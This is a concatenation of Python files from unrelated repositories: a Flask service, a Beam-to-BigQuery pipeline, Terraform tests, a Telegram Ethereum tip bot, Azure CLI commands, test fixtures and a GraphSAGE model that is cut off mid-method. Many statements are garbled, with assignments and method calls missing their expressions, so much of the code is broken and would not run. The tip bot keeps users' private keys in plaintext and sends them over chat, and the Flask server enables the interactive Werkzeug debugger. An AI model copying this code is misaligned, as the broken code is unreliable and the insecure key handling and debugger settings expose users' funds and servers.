else: from io import StringIO import inspect import os class ThreadPrinter(object): def __init__(self, lock): self.fhs = {} self.lock = lock def write(self, value): with self.lock: frm = inspect.stack()[1][1] splittedFromPath = frm.split(os.path.sep) test_group = splittedFromPath[-2] test = splittedFromPath[-1] curTestName = '%s/%s' % (test_group, test) if curTestName in self.fhs: f = self.fhs[curTestName] else: f = StringIO() f.write(value) self.fhs[curTestName] = f def getValueByTestName(self, testName): result = '' for key, value in self.fhs.items(): key = key.replace('_modified', '') if key == testName: result = value.getvalue() return result ``` #### File: indigo-service/service/ ```python import logging import sys from flask import Flask, jsonify, Blueprint from flasgger import Swagger from optparse import OptionParser from werkzeug.serving import run_simple from v2.libraries_api import libraries_api from v2.indigo_api import indigo_api, indigo_init from v2.db.database import db_session from v2.imago_api import imago_api from v2.common_api import common_api def is_indigo_db(): try: import socket socket.gethostbyname('indigo_db') return True except: return False app = Flask(__name__) app.config.from_pyfile('') if is_indigo_db(): app.register_blueprint(libraries_api, url_prefix='/v2/libraries') app.register_blueprint(indigo_api, url_prefix='/v2/indigo') app.register_blueprint(imago_api, url_prefix='/v2/imago') app.register_blueprint(common_api,url_prefix='/v2') Swagger(app) # logging.basicConfig(, level=logging.INFO) logging.basicConfig(stream=sys.stdout, format = u'[%(asctime)s: %(levelname)-8s/%(filename)s:%(lineno)d] %(message)s', level = app.config.get('LOG_LEVEL')) def run_server(port): run_simple('', port, app, use_reloader=True, use_debugger=True, use_evalex=True) @app.teardown_appcontext def shutdown_session(exception=None): db_session.remove() if __name__ == "__main__": parser = OptionParser() parser.add_option("-s", "--server", action="store_true", dest="run_server", default=False, help="Run local server") parser.add_option("-p", "--port", action="store", dest="port", type="int", default=5000, help="Specify port") (options, args) = parser.parse_args() if options.run_server: run_server(options.port) ```
{ "source": "00inboxtest/cloud-foundation-fabric", "score": 3 }
#### File: scripts/data_ingestion/ ```python import argparse import logging import re import apache_beam as beam from apache_beam.options.pipeline_options import PipelineOptions class DataIngestion: """A helper class which contains the logic to translate the file into a format BigQuery will accept.""" def parse_method(self, string_input): """Translate CSV row to dictionary. Args: string_input: A comma separated list of values in the form of name,surname Example string_input: lorenzo,caggioni Returns: A dict mapping BigQuery column names as keys example output: { 'name': 'mario', 'surname': 'rossi', 'age': 30 } """ # Strip out carriage return, newline and quote characters. values = re.split(",", re.sub('\r\n', '', re.sub('"', '', string_input))) row = dict( zip(('name', 'surname', 'age'), values)) return row class InjectTimestamp(beam.DoFn): """A class which add a timestamp for each row. Args: element: A dictionary mapping BigQuery column names Example: { 'name': 'mario', 'surname': 'rossi', 'age': 30 } Returns: The input dictionary with a timestamp value added Example: { 'name': 'mario', 'surname': 'rossi', 'age': 30 '_TIMESTAMP': 1545730073 } """ def process(self, element): import time element['_TIMESTAMP'] = int(time.mktime(time.gmtime())) return [element] def run(argv=None): """The main function which creates the pipeline and runs it.""" parser = argparse.ArgumentParser() parser.add_argument( '--input', dest='input', required=False, help='Input file to read. This can be a local file or ' 'a file in a Google Storage Bucket.') parser.add_argument( '--output', dest='output', required=False, help='Output BQ table to write results to.') # Parse arguments from the command line. known_args, pipeline_args = parser.parse_known_args(argv) # DataIngestion is a class we built in this script to hold the logic for # transforming the file into a BigQuery table. data_ingestion = DataIngestion() # Initiate the pipeline using the pipeline arguments p = beam.Pipeline(options=PipelineOptions(pipeline_args)) (p # Read the file. This is the source of the pipeline. | 'Read from a File' >> # Translates CSV row to a dictionary object consumable by BigQuery. | 'String To BigQuery Row' >> beam.Map(lambda s: data_ingestion.parse_method(s)) # Add the timestamp on each row | 'Inject Timestamp - ' >> beam.ParDo(InjectTimestamp()) # Write data to Bigquery | 'Write to BigQuery' >> # BigQuery table name. known_args.output, # Bigquery table schema schema='name:STRING,surname:STRING,age:NUMERIC,_TIMESTAMP:TIMESTAMP', # Creates the table in BigQuery if it does not yet exist., # Deletes all data in the BigQuery table before writing. if __name__ == '__main__': logging.getLogger().setLevel(logging.INFO) run() ``` #### File: modules/compute_mig/ ```python import os import pytest FIXTURES_DIR = os.path.join(os.path.dirname(__file__), 'fixture') def test_defaults(plan_runner): "Test variable defaults." _, resources = plan_runner(FIXTURES_DIR) assert len(resources) == 1 print(resources[0]['type']) mig = resources[0] assert mig['type'] == 'google_compute_instance_group_manager' assert mig['values']['target_size'] == 2 assert mig['values']['zone'] _, resources = plan_runner(FIXTURES_DIR, regional='true') assert len(resources) == 1 mig = resources[0] assert mig['type'] == 'google_compute_region_instance_group_manager' assert mig['values']['target_size'] == 2 assert mig['values']['region'] def test_health_check(plan_runner): "Test health check resource." health_check_config = '{type="tcp", check={port=80}, config=null, logging=false}' _, resources = plan_runner( FIXTURES_DIR, health_check_config=health_check_config) assert len(resources) == 2 assert any(r['type'] == 'google_compute_health_check' for r in resources) def test_autoscaler(plan_runner): "Test autoscaler resource." autoscaler_config = ( '{' 'max_replicas=3, min_replicas=1, cooldown_period=60,' 'cpu_utilization_target=65, load_balancing_utilization_target=null,' 'metric=null' '}' ) _, resources = plan_runner( FIXTURES_DIR, autoscaler_config=autoscaler_config) assert len(resources) == 2 autoscaler = resources[0] assert autoscaler['type'] == 'google_compute_autoscaler' assert autoscaler['values']['autoscaling_policy'] == [{ 'cooldown_period': 60, 'cpu_utilization': [{'predictive_method': 'NONE', 'target': 65}], 'load_balancing_utilization': [], 'max_replicas': 3, 'metric': [], 'min_replicas': 1, 'mode': 'ON', 'scale_in_control': [], 'scaling_schedules': [], }] _, resources = plan_runner( FIXTURES_DIR, autoscaler_config=autoscaler_config, regional='true') assert len(resources) == 2 autoscaler = resources[0] assert autoscaler['type'] == 'google_compute_region_autoscaler' def test_stateful_mig(plan_runner): "Test stateful instances - mig." stateful_config = ( '{' 'per_instance_config = {},' 'mig_config = {' 'stateful_disks = {' 'persistent-disk-1 = {delete_rule="NEVER"}' '}' '}' '}' ) _, resources = plan_runner( FIXTURES_DIR, stateful_config=stateful_config) assert len(resources) == 1 statefuldisk = resources[0] assert statefuldisk['type'] == 'google_compute_instance_group_manager' assert statefuldisk['values']['stateful_disk'] == [{ 'device_name': 'persistent-disk-1', 'delete_rule': 'NEVER', }] def test_stateful_instance(plan_runner): "Test stateful instances - instance." stateful_config = ( '{' 'per_instance_config = {' 'instance-1 = {' 'stateful_disks = {' 'persistent-disk-1 = {' 'source = "test-disk",' 'mode = "READ_ONLY",' 'delete_rule= "NEVER",' '},' '},' 'metadata = {' 'foo = "bar"' '},' 'update_config = {' 'minimal_action = "NONE",' 'most_disruptive_allowed_action = "REPLACE",' 'remove_instance_state_on_destroy = false,' '},' '},' '},' 'mig_config = {' 'stateful_disks = {' 'persistent-disk-1 = {delete_rule="NEVER"}' '}' '}' '}' ) _, resources = plan_runner( FIXTURES_DIR, stateful_config=stateful_config) assert len(resources) == 2 instanceconfig = resources[0] assert instanceconfig['type'] == 'google_compute_instance_group_manager' instanceconfig = resources[1] assert instanceconfig['type'] == 'google_compute_per_instance_config' assert instanceconfig['values']['preserved_state'] == [{ 'disk': [{ 'device_name': 'persistent-disk-1', 'delete_rule': 'NEVER', 'source': 'test-disk', 'mode': 'READ_ONLY', }], 'metadata': { 'foo': 'bar' } }] assert instanceconfig['values']['minimal_action'] == 'NONE' assert instanceconfig['values']['most_disruptive_allowed_action'] == 'REPLACE' assert instanceconfig['values']['remove_instance_state_on_destroy'] == False ``` #### File: modules/iam_service_account/ ```python import os import pytest FIXTURES_DIR = os.path.join(os.path.dirname(__file__), 'fixture') def test_resources(plan_runner): "Test service account resource." _, resources = plan_runner(FIXTURES_DIR) assert len(resources) == 1 resource = resources[0] assert resource['type'] == 'google_service_account' assert resource['values']['account_id'] == 'sa-one' _, resources = plan_runner(FIXTURES_DIR, prefix='foo') assert len(resources) == 1 resource = resources[0] assert resource['values']['account_id'] == 'foo-sa-one' def test_iam_roles(plan_runner): "Test iam roles with one member." iam = ('{"roles/iam.serviceAccountUser" = ["user:<EMAIL>"]}') _, resources = plan_runner(FIXTURES_DIR, iam=iam) assert len(resources) == 2 iam_resources = [r for r in resources if r['type'] != 'google_service_account'] assert len(iam_resources) == 1 iam_resource = iam_resources[0] assert iam_resource['type'] == 'google_service_account_iam_binding' assert iam_resource['index'] == 'roles/iam.serviceAccountUser' assert iam_resource['values']['role'] == 'roles/iam.serviceAccountUser' assert iam_resource['values']['members'] == ["user:<EMAIL>"] ``` #### File: modules/vpc_sc/ ```python import os FIXTURES_DIR = os.path.join(os.path.dirname(__file__), 'fixture') def test_create_policy(plan_runner): "Test with auto-created policy." _, resources = plan_runner(FIXTURES_DIR) counts = {} for r in resources: n = f'{r["type"]}.{r["name"]}' counts[n] = counts.get(n, 0) + 1 assert counts == { 'google_access_context_manager_access_level.basic': 2, 'google_access_context_manager_access_policy.default': 1, 'google_access_context_manager_service_perimeter.bridge': 2, 'google_access_context_manager_service_perimeter.regular': 2 } def test_use_policy(plan_runner): "Test with existing policy." _, resources = plan_runner(FIXTURES_DIR, access_policy_create="null", access_policy="accessPolicies/foobar") counts = {} for r in resources: n = f'{r["type"]}.{r["name"]}' counts[n] = counts.get(n, 0) + 1 assert counts == { 'google_access_context_manager_access_level.basic': 2, 'google_access_context_manager_service_perimeter.bridge': 2, 'google_access_context_manager_service_perimeter.regular': 2 } ```
{ "source": "00jw/Tip-bot", "score": 2 }
#### File: 00jw/Tip-bot/ ```python import json import traceback from random import randint from pymongo import MongoClient from telegram import Bot from web3 import Web3, HTTPProvider import argparse parser = argparse.ArgumentParser() parser.add_argument("-c", "--config", type=str, required=True, help="Config file") parser.add_argument("-t", "--toothless", help="Does not send transactions", action="store_true") parser.add_argument("-v", "--verbose", help="A more verbose output", action="store_true") options = parser.parse_args() with open(options.config) as conf_file: conf = json.load(conf_file) connectionString = conf['mongo']['connectionString'] + "/" + conf['mongo']['db'] http_provider = conf['web3']['provider'] bot_token = conf['telegram_bot']['bot_token'] dictionary = conf['dictionary'] donate_address = conf['donate_address'] class TipBot: def __init__(self, w3): if options.toothless: print("Running toothless. Transactions will not be sent") self.w3 = w3 print("Web3 Connected: %s " % self.w3.isConnected()) # Telegram bot initialization = Bot(bot_token) # Tip bot Initialization client = MongoClient(connectionString) db = client.get_database() self.col_users = db['Users'] # get chat updates self.new_message = self.wait_new_message() self.message = self.new_message.message \ if self.new_message.message is not None \ else self.new_message.callback_query.message self.text, _is_document = self.get_action(self.new_message) self.message_text = str(self.text).lower() print(self.text) # init user data try: self.first_name = self.new_message.effective_user.first_name self.username = self.new_message.effective_user.username self.user_id = except Exception as exc: print(exc) self.chat_id = self.address = self.get_user_address() split = self.message_text.split(' ') if len(split) > 1: args = split[1:] else: args = None self.check_username_on_change() self.action_processing(split[0], args) """ Get group username """ def get_group_username(self): try: return str( except: return str( """ Get User username """ def get_user_username(self): try: return str(self.message.from_user.username) except: if options.verbose: print("Could not find username for:") print(self.message) return None def wait_new_message(self): while True: updates = if len(updates) > 0: break update = updates[0]["update_id"] + 1) return update """ Get user action | msg or callback """ @staticmethod def get_action(message): _is_document = False if message['message'] is not None: menu_option = message['message']['text'] _is_document = message['message']['document'] is not None elif message["callback_query"] != 0: menu_option = message["callback_query"]["data"] return str(menu_option), _is_document """ Handle user actions """ def action_processing(self, cmd, args): if "/start" == cmd: _is_user_exists = self.col_users.find_one({"_id": self.user_id}) is not None if not _is_user_exists: public_key, pr_key = self.create_user_wallet() self.col_users.insert({ "_id": self.user_id, "UserName": self.username, "Address": public_key, "PrivateKey": pr_key, "Balance": 0 }) self.user_id, dictionary['welcome'] % public_key, parse_mode='HTML' ) elif "/tip" == cmd or "/send" == cmd: if args is not None and len(args) >= 1: if options.verbose: print("self.message:") print(self.message) if self.message.reply_to_message is not None: if options.verbose: print("running tip_in_the_chat() with args:") print(*args) self.tip_in_the_chat(*args) else: if options.verbose: print("running tip_user() with args:") print(*args) self.tip_user(*args) else:, dictionary['incorrect_parameters'], parse_mode='HTML') elif "/balance" == cmd: balance = self.check_balance() self.user_id, dictionary['balance'] % balance, parse_mode='HTML' ) elif "/withdraw" == cmd: try: if args is not None and len(args) == 2: self.withdraw_coins(*args) else: self.user_id, dictionary['incorrect_withdraw'], parse_mode='HTML' ) except Exception as exc: print(exc) elif "/deposit" == cmd: self.user_id, dictionary['deposit'] % self.address, parse_mode='HTML' ) elif "/donate" == cmd: if args is not None or len(args) == 1: self.donate(*args) else: self.user_id, dictionary['donate'], parse_mode='HTML' ) elif "/help" == cmd: self.user_id, dictionary['help'], parse_mode='HTML' ) elif "/backup" == cmd: _private_key = self.col_users.find_one({"_id": self.user_id})['PrivateKey'] self.user_id, dictionary['backup'] % _private_key, parse_mode='HTML' ) """ Check username on change in the bot """ def check_username_on_change(self): _is_username_in_db = self.col_users.find_one({"UserName": self.username}) is not None if self.username is not None else True if not _is_username_in_db: self.col_users.update( { "_id": self.user_id }, { "$set": { "UserName": self.username } } ) """ Create new wallet for new bot member """ def create_user_wallet(self): acct = self.w3.eth.account.create('%s %s %s' % (self.user_id, self.first_name, randint(10000, 1000000))) print(acct.address, acct.privateKey.hex()) return acct.address, acct.privateKey.hex() """ Check user balance """ def check_balance(self): balance = self.w3.fromWei(self.w3.eth.getBalance(self.address), 'ether') return balance """ Get user data """ def get_user_address(self): try: _user = self.col_users.find_one({"_id": self.user_id}) return _user['Address'] except Exception as exc: print(exc) return None, None """ Withdraw coins to address with params: address amount """ def withdraw_coins(self, address, amount): try: try: amount = float(amount) except Exception as exc:, dictionary['incorrect_amount'], parse_mode='HTML') print(exc) balance = self.check_balance() if balance > amount: to_address = self.w3.toChecksumAddress(address) gas = 21000 gas_price = self.w3.eth.gasPrice txn = \ { 'from': self.address, 'gas': gas, 'to': to_address, 'value': self.w3.toWei(amount, 'ether') - (gas*gas_price), 'gasPrice': gas_price, 'nonce': self.w3.eth.getTransactionCount(self.address), } _private_key = self.col_users.find_one({"_id": self.user_id})['PrivateKey'] signed_txn = self.w3.eth.account.signTransaction(txn, private_key=_private_key) if options.toothless: tx = signex_txn.hash.hex() else: tx = self.w3.eth.sendRawTransaction(signed_txn.rawTransaction) tx = self.w3.toHex(tx), dictionary['withdrawal_result'] % (amount, address, tx), parse_mode='HTML') else:, dictionary['incorrect_balance'] % balance, parse_mode='HTML') except Exception as exc: print(exc) """ Donate to address """ def donate(self, amount): try: try: amount = float(amount) except Exception as exc:, dictionary['incorrect_amount'], parse_mode='HTML') print(exc) balance = self.check_balance() if balance > amount: to_address = self.w3.toChecksumAddress(donate_address) gas = 21000 gas_price = self.w3.eth.gasPrice txn = \ { 'from': self.address, 'gas': gas, 'to': to_address, 'value': self.w3.toWei(amount, 'ether') - (gas*gas_price), 'gasPrice': gas_price, 'nonce': self.w3.eth.getTransactionCount(self.address), } _private_key = self.col_users.find_one({"_id": self.user_id})['PrivateKey'] signed_txn = self.w3.eth.account.signTransaction(txn, private_key=_private_key) if options.toothless: tx = signed_txn.hash.hex() else: tx = self.w3.eth.sendRawTransaction(signed_txn.rawTransaction) tx = self.w3.toHex(tx), dictionary['donate_result'] % (balance, tx), parse_mode='HTML') else:, dictionary['incorrect_balance'] % balance, parse_mode='HTML') except Exception as exc: print(exc) """ Tip user with params: username amount """ def tip_user(self, username, amount, coin=conf['currency']): try: try: amount = float(amount) except Exception as exc:, dictionary['incorrect_amount'], parse_mode='HTML') print(exc) username = username.replace('@', '') _user = self.col_users.find_one({"UserName": username}) _is_username_exists = _user is not None if not _is_username_exists:, dictionary['username_error'], parse_mode='HTML') return self.send_tip(_user['_id'], _user['Address'], amount, coin) except Exception as exc: print(exc) """ Send a tip to user in the chat """ def tip_in_the_chat(self, amount, coin=conf['currency']): try: try: amount = float(amount) except Exception as exc:, dictionary['incorrect_amount'], parse_mode='HTML') print(exc) _user = self.col_users.find_one({"_id":}) self.send_tip(, _user['Address'], amount, coin) except Exception as exc: print(exc) """ Send tip to user with params user_id - user identificator addrees - user address amount - amount of a tip """ def send_tip(self, user_id, address, amount, coin): try: balance = self.check_balance() if balance > amount: gas = 21000 gas_price = self.w3.eth.gasPrice txn = \ { 'from': self.address, 'gas': gas, 'to': address, 'value': self.w3.toWei(amount, 'ether') - (gas*gas_price), 'gasPrice': gas_price, 'nonce': self.w3.eth.getTransactionCount(self.address), } _private_key = self.col_users.find_one({"_id": self.user_id})[ 'PrivateKey'] signed_txn = self.w3.eth.account.signTransaction(txn, private_key=_private_key) if options.toothless: tx = signed_txn.hash.hex() else: tx = self.w3.eth.sendRawTransaction(signed_txn.rawTransaction) tx = self.w3.toHex(tx), dictionary['tip_recieved'] % (amount, coin, tx), parse_mode='HTML'), dictionary['tip_sent'] % (amount, coin, tx), parse_mode='HTML') else:, dictionary['incorrect_balance'] % (coin, balance), parse_mode='HTML') except Exception as exc: print(exc) def main(): w3 = Web3(HTTPProvider(http_provider)) while True: try: TipBot(w3=w3) except Exception as e: if "Timed out" not in str(e): traceback.print_exc() print(e) if __name__ == '__main__': main() ```
{ "source": "00Kai0/", "score": 2 }
#### File: azext_managed_network/generated/ ```python from azure.cli.core.util import sdk_no_wait def managed_network_mn_list(client, resource_group_name=None, top=None, skiptoken=None): if resource_group_name: return client.list_by_resource_group(resource_group_name=resource_group_name, top=top, skiptoken=skiptoken) return client.list_by_subscription(top=top, skiptoken=skiptoken) def managed_network_mn_create(client, resource_group_name, managed_network_name, location, tags=None, properties=None): return client.create_or_update(resource_group_name=resource_group_name, managed_network_name=managed_network_name, location=location, tags=tags, properties=properties) def managed_network_mn_update(client, resource_group_name, managed_network_name, tags=None): return client.begin_update(resource_group_name=resource_group_name, managed_network_name=managed_network_name, tags=tags) def managed_network_mn_delete(client, resource_group_name, managed_network_name): return client.begin_delete(resource_group_name=resource_group_name, managed_network_name=managed_network_name) def managed_network_mn_get_modify(client, resource_group_name, managed_network_name): return client.get_modify(resource_group_name=resource_group_name, managed_network_name=managed_network_name) def managed_network_mn_scope_assignment_list(client, scope): return client.list(scope=scope) def managed_network_mn_scope_assignment_show(client, scope, scope_assignment_name): return client.get(scope=scope, scope_assignment_name=scope_assignment_name) def managed_network_mn_scope_assignment_create(client, scope, scope_assignment_name, location, assigned_managed_network=None): return client.create_or_update(scope=scope, scope_assignment_name=scope_assignment_name, location=location, assigned_managed_network=assigned_managed_network) def managed_network_mn_scope_assignment_update(client, scope, scope_assignment_name, location, assigned_managed_network=None): return client.create_or_update(scope=scope, scope_assignment_name=scope_assignment_name, location=location, assigned_managed_network=assigned_managed_network) def managed_network_mn_scope_assignment_delete(client, scope, scope_assignment_name): return client.delete(scope=scope, scope_assignment_name=scope_assignment_name) def managed_network_mn_group_list(client, resource_group_name, managed_network_name, top=None, skiptoken=None): return client.list_by_managed_network(resource_group_name=resource_group_name, managed_network_name=managed_network_name, top=top, skiptoken=skiptoken) def managed_network_mn_group_show(client, resource_group_name, managed_network_name, group_name): return client.get(resource_group_name=resource_group_name, managed_network_name=managed_network_name, managed_network_group_name=group_name) def managed_network_mn_group_create(client, resource_group_name, managed_network_name, group_name, location, management_groups=None, subscriptions=None, virtual_networks=None, subnets=None, no_wait=False): return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name=resource_group_name, managed_network_name=managed_network_name, managed_network_group_name=group_name, location=location, management_groups=management_groups, subscriptions=subscriptions, virtual_networks=virtual_networks, subnets=subnets) def managed_network_mn_group_update(client, resource_group_name, managed_network_name, group_name, location, management_groups=None, subscriptions=None, virtual_networks=None, subnets=None, no_wait=False): return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name=resource_group_name, managed_network_name=managed_network_name, managed_network_group_name=group_name, location=location, management_groups=management_groups, subscriptions=subscriptions, virtual_networks=virtual_networks, subnets=subnets) def managed_network_mn_group_delete(client, resource_group_name, managed_network_name, group_name, no_wait=False): return sdk_no_wait(no_wait, client.begin_delete, resource_group_name=resource_group_name, managed_network_name=managed_network_name, managed_network_group_name=group_name) def managed_network_managed_network_peering_policy_list(client, resource_group_name, managed_network_name, top=None, skiptoken=None): return client.list_by_managed_network(resource_group_name=resource_group_name, managed_network_name=managed_network_name, top=top, skiptoken=skiptoken) def managed_network_managed_network_peering_policy_show(client, resource_group_name, managed_network_name, policy_name): return client.get(resource_group_name=resource_group_name, managed_network_name=managed_network_name, managed_network_peering_policy_name=policy_name) def managed_network_managed_network_peering_policy_hub_and_spoke_topology_create(client, resource_group_name, managed_network_name, policy_name, location, hub=None, spokes=None, mesh=None, no_wait=False): properties = {} properties['type'] = 'HubAndSpokeTopology' properties['hub'] = hub properties['spokes'] = spokes properties['mesh'] = mesh return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name=resource_group_name, managed_network_name=managed_network_name, managed_network_peering_policy_name=policy_name, location=location, properties=properties) def managed_network_managed_network_peering_policy_mesh_topology_create(client, resource_group_name, managed_network_name, policy_name, location, hub=None, spokes=None, mesh=None, no_wait=False): properties = {} properties['type'] = 'MeshTopology' properties['hub'] = hub properties['spokes'] = spokes properties['mesh'] = mesh return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name=resource_group_name, managed_network_name=managed_network_name, managed_network_peering_policy_name=policy_name, location=location, properties=properties) def managed_network_managed_network_peering_policy_hub_and_spoke_topology_update(instance, resource_group_name, managed_network_name, policy_name, location, hub=None, spokes=None, mesh=None, no_wait=False): instance.type = 'HubAndSpokeTopology' if hub is not None: instance.hub = hub if spokes is not None: instance.spokes = spokes if mesh is not None: instance.mesh = mesh return instance def managed_network_managed_network_peering_policy_mesh_topology_update(instance, resource_group_name, managed_network_name, policy_name, location, hub=None, spokes=None, mesh=None, no_wait=False): instance.type = 'MeshTopology' if hub is not None: instance.hub = hub if spokes is not None: instance.spokes = spokes if mesh is not None: instance.mesh = mesh return instance def managed_network_managed_network_peering_policy_delete(client, resource_group_name, managed_network_name, policy_name, no_wait=False): return sdk_no_wait(no_wait, client.begin_delete, resource_group_name=resource_group_name, managed_network_name=managed_network_name, managed_network_peering_policy_name=policy_name) ```
{ "source": "00Kai0/databases", "score": 3 }
#### File: databases/databases/ ```python import typing from sqlalchemy.engine import RowProxy from sqlalchemy.sql import ClauseElement class DatabaseBackend: async def connect(self) -> None: raise NotImplementedError() # pragma: no cover async def disconnect(self) -> None: raise NotImplementedError() # pragma: no cover def connection(self) -> "ConnectionBackend": raise NotImplementedError() # pragma: no cover class ConnectionBackend: async def acquire(self) -> None: raise NotImplementedError() # pragma: no cover async def release(self) -> None: raise NotImplementedError() # pragma: no cover async def fetch_all(self, query: ClauseElement) -> typing.List[RowProxy]: raise NotImplementedError() # pragma: no cover async def fetch_one(self, query: ClauseElement) -> RowProxy: raise NotImplementedError() # pragma: no cover async def execute(self, query: ClauseElement, values: dict = None) -> None: raise NotImplementedError() # pragma: no cover async def execute_many(self, query: ClauseElement, values: list) -> None: raise NotImplementedError() # pragma: no cover async def iterate( self, query: ClauseElement ) -> typing.AsyncGenerator[RowProxy, None]: raise NotImplementedError() # pragma: no cover # mypy needs async iterators to contain a `yield` # yield True # pragma: no cover def transaction(self) -> "TransactionBackend": raise NotImplementedError() # pragma: no cover class TransactionBackend: async def start(self, is_root: bool) -> None: raise NotImplementedError() # pragma: no cover async def commit(self) -> None: raise NotImplementedError() # pragma: no cover async def rollback(self) -> None: raise NotImplementedError() # pragma: no cover ```
{ "source": "00Kai0/fastapi", "score": 3 }
#### File: app/routers/ ```python from fastapi import APIRouter router = APIRouter() @router.get("/", tags=["items"]) async def read_items(): return [{"name": "Item Foo"}, {"name": "item Bar"}] @router.get("/{item_id}", tags=["items"]) async def read_item(item_id: str): return {"name": "Fake Specific Item", "item_id": item_id} ```
{ "source": "00Kai0/httpcore", "score": 2 }
#### File: httpcore/tests/ ```python import asyncio import pytest import trustme from cryptography.hazmat.primitives.serialization import ( BestAvailableEncryption, Encoding, PrivateFormat, ) from uvicorn.config import Config from uvicorn.main import Server async def app(scope, receive, send): assert scope["type"] == "http" if scope["path"] == "/slow_response": await slow_response(scope, receive, send) elif scope["path"].startswith("/status"): await status_code(scope, receive, send) elif scope["path"].startswith("/echo_body"): await echo_body(scope, receive, send) else: await hello_world(scope, receive, send) async def hello_world(scope, receive, send): await send( { "type": "http.response.start", "status": 200, "headers": [[b"content-type", b"text/plain"]], } ) await send({"type": "http.response.body", "body": b"Hello, world!"}) async def slow_response(scope, receive, send): await asyncio.sleep(0.1) await send( { "type": "http.response.start", "status": 200, "headers": [[b"content-type", b"text/plain"]], } ) await send({"type": "http.response.body", "body": b"Hello, world!"}) async def status_code(scope, receive, send): status_code = int(scope["path"].replace("/status/", "")) await send( { "type": "http.response.start", "status": status_code, "headers": [[b"content-type", b"text/plain"]], } ) await send({"type": "http.response.body", "body": b"Hello, world!"}) async def echo_body(scope, receive, send): body = b"" more_body = True while more_body: message = await receive() body += message.get("body", b"") more_body = message.get("more_body", False) await send( { "type": "http.response.start", "status": 200, "headers": [[b"content-type", b"text/plain"]], } ) await send({"type": "http.response.body", "body": body}) class CAWithPKEncryption(trustme.CA): """Implementation of trustme.CA() that can emit private keys that are encrypted with a password. """ @property def encrypted_private_key_pem(self): return trustme.Blob( self._private_key.private_bytes( Encoding.PEM, PrivateFormat.TraditionalOpenSSL, BestAvailableEncryption(password=b"password"), ) ) @pytest.fixture def example_cert(): ca = CAWithPKEncryption() ca.issue_cert("") return ca @pytest.fixture def cert_pem_file(example_cert): with example_cert.cert_pem.tempfile() as tmp: yield tmp @pytest.fixture def cert_private_key_file(example_cert): with example_cert.private_key_pem.tempfile() as tmp: yield tmp @pytest.fixture def cert_encrypted_private_key_file(example_cert): with example_cert.encrypted_private_key_pem.tempfile() as tmp: yield tmp @pytest.fixture async def server(): config = Config(app=app, lifespan="off") server = Server(config=config) task = asyncio.ensure_future(server.serve()) try: while not server.started: await asyncio.sleep(0.0001) yield server finally: server.should_exit = True await task @pytest.fixture async def https_server(cert_pem_file, cert_private_key_file): config = Config( app=app, lifespan="off", ssl_certfile=cert_pem_file, ssl_keyfile=cert_private_key_file, port=8001, ) server = Server(config=config) task = asyncio.ensure_future(server.serve()) try: while not server.started: await asyncio.sleep(0.0001) yield server finally: server.should_exit = True await task ``` #### File: httpcore/tests/ ```python import pytest from httpx.utils import guess_json_utf @pytest.mark.parametrize( "encoding", ( "utf-32", "utf-8-sig", "utf-16", "utf-8", "utf-16-be", "utf-16-le", "utf-32-be", "utf-32-le", ), ) def test_encoded(encoding): data = "{}".encode(encoding) assert guess_json_utf(data) == encoding def test_bad_utf_like_encoding(): assert guess_json_utf(b"\x00\x00\x00\x00") is None @pytest.mark.parametrize( ("encoding", "expected"), ( ("utf-16-be", "utf-16"), ("utf-16-le", "utf-16"), ("utf-32-be", "utf-32"), ("utf-32-le", "utf-32"), ), ) def test_guess_by_bom(encoding, expected): data = u"\ufeff{}".encode(encoding) assert guess_json_utf(data) == expected ```
{ "source": "00Kai0/nativeauthenticator", "score": 3 }
#### File: nativeauthenticator/nativeauthenticator/ ```python import bcrypt import re from jupyterhub.orm import Base from sqlalchemy import Boolean, Column, Integer, String, LargeBinary from sqlalchemy.orm import validates class UserInfo(Base): __tablename__ = 'users_info' id = Column(Integer, primary_key=True, autoincrement=True) username = Column(String, nullable=False) password = Column(LargeBinary, nullable=False) is_authorized = Column(Boolean, default=False) email = Column(String) @classmethod def find(cls, db, username): """Find a user info record by name. Returns None if not found""" return db.query(cls).filter(cls.username == username).first() def is_valid_password(self, password): """Checks if a password passed matches the password stored""" encoded_pw = bcrypt.hashpw(password.encode(), self.password) return encoded_pw == self.password @classmethod def change_authorization(cls, db, username): user = db.query(cls).filter(cls.username == username).first() user.is_authorized = not user.is_authorized db.commit() return user @validates('email') def validate_email(self, key, address): if not address: return assert re.match(r"^[A-Za-z0-9\.\+_-]+@[A-Za-z0-9\._-]+\.[a-zA-Z]*$", address) return address ```
{ "source": "00krishna-research/lightning-graph-graphsage", "score": 2 }
#### File: src/models/ ```python from typing import Any, List, NamedTuple from torchmetrics import MaxMetric import torch from torch import Tensor import torch.nn.functional as F from torch.nn import ModuleList, BatchNorm1d from torch_sparse import SparseTensor from torchmetrics import Accuracy from pytorch_lightning import LightningModule import torch_geometric.transforms as T from torch_geometric.nn import SAGEConv class Batch(NamedTuple): x: Tensor y: Tensor adjs_t: List[SparseTensor] class GraphSAGELitModel(LightningModule): def __init__(self, in_channels: int, out_channels: int, hidden_channels: int = 256, num_layers: int = 2, dropout: float = 0.5, lr: float = 0.001, weight_decay: float = 0.0005): super().__init__() self.save_hyperparameters() self.dropout = dropout self.convs = ModuleList() self.convs.append(SAGEConv(in_channels, hidden_channels)) for _ in range(num_layers - 2): self.convs.append(SAGEConv(hidden_channels, hidden_channels)) self.convs.append(SAGEConv(hidden_channels, out_channels)) self.bns = ModuleList() for _ in range(num_layers - 1): self.bns.append(BatchNorm1d(hidden_channels)) self.train_acc = Accuracy() self.val_acc = Accuracy() self.test_acc = Accuracy() # for logging best so far validation accuracy self.val_acc_best = MaxMetric() def forward(self, x: Tensor, adjs_t: List[SparseTensor]) -> Tensor: for i, adj_t in enumerate(adjs_t): x = self.convs[i]((x, x[:adj_t.size(0)]), adj_t) if i < len(adjs_t) - 1: x = self.bns[i](x) x = x.relu_() x = F.dropout(x, p=self.dropout, return x def training_step(self, batch: Batch, batch_idx: int): x, y, adjs_t = batch y_hat = self(x, adjs_t) train_loss = F.cross_entropy(y_hat, y) self.train_acc(y_hat.softmax(dim=-1), y) self.log('train_acc', self.train_acc, prog_bar=True, on_step=False, on_epoch=True) return train_loss def validation_step(self, batch: Batch, batch_idx: int): x, y, adjs_t = batch y_hat = self(x, adjs_t) self.val_acc(y_hat.softmax(dim=-1), y) self.log('val_acc', self.val_acc, prog_bar=True, on_step=False, on_epoch=True) def test_step(self, batch: Batch, batch_idx: int): x, y, adjs_t = batch y_hat = self(x, adjs_t) 